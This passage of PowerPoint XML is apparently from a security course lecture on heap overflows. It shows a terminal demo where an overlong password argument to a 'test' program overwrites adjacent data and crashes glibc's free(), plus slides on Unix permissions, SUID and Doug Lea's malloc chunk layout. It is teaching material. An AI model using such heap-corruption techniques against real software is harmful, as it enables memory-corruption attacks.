              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Wrong password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>% test vigna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fooooooooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ooooooooooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Wrong username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ooooo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>*** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>glibc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> detected *** ./test: free(): invalid next size (fast): 0x0807f008 ***</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>======= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Backtrace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>: =========</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/lib/libc.so.6[0xb33424]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/lib/libc.so.6(__libc_free+0x77)[0xb3395f]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>./test[0x8048791]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/lib/libc.so.6(__libc_start_main+0xc6)[0xae4de6]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>./test[0x8048525]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>% test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>vigna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foooooooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>oooooooroot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Wrong password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foooooooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>oooooooroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> for user root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Segmentation fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263198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52B0-A744-6630-969B-6C79FC36E267}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Permissions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68CB001B-3B0F-43AD-0562-02602D03D79C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read, Write, Execute bits (RWX)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User, Group, Other bits (UGO)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mask: Specify the default permission for new objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type: file (-), directory (d), link (l), character device (c), etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First character of the permission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Special bits: sticky bit (limits deletion), SUID bit (changes effective UID to file’s owner)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Permission is managed with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ownership is performed with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chown</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388588988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4" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Case Study: Doug Lea’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Malloc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1039365" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chunk Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bin Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory Allocation	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory De-allocation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List Handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note: this is an over-simplified view of memory management in the heap	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We do not discuss </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fastbins</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We do not discuss other optimizations, such as large chunks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151925739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22" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory Layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041423" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The heap is divided into contiguous chunks of memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Each memory chunk can be allocated, freed, split, coalesced (two free chunks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>No two free chunks may be physically adjacent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041424" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810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25" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="3717181"/>
            <a:ext cx="1143000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solid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used</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041426" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="3717181"/>
            <a:ext cx="7620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free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041427" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="24384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29" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="857250" y="3086150"/>
            <a:ext cx="1377300" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Low addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041430" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="3031381"/>
            <a:ext cx="1408020" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>High addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041431" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="3717181"/>
            <a:ext cx="1447800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solid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used</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041432" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="41148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33" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="3717181"/>
            <a:ext cx="14478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wilderness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041434" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="64770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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="423983465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60" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chunk Management (32-bit)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1043461" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each chunk starts with a boundary tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Holds chunk management information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>16-byte structure, which is the minimum allocated size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>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size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>prev_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; // only used when previous chunk is free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> size; // size of chunk in bytes (including overhead </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>               // and multiple of 8 bytes) + 2 status bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>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r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; // only used for free chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>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r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; // only used for free chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointer returned by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
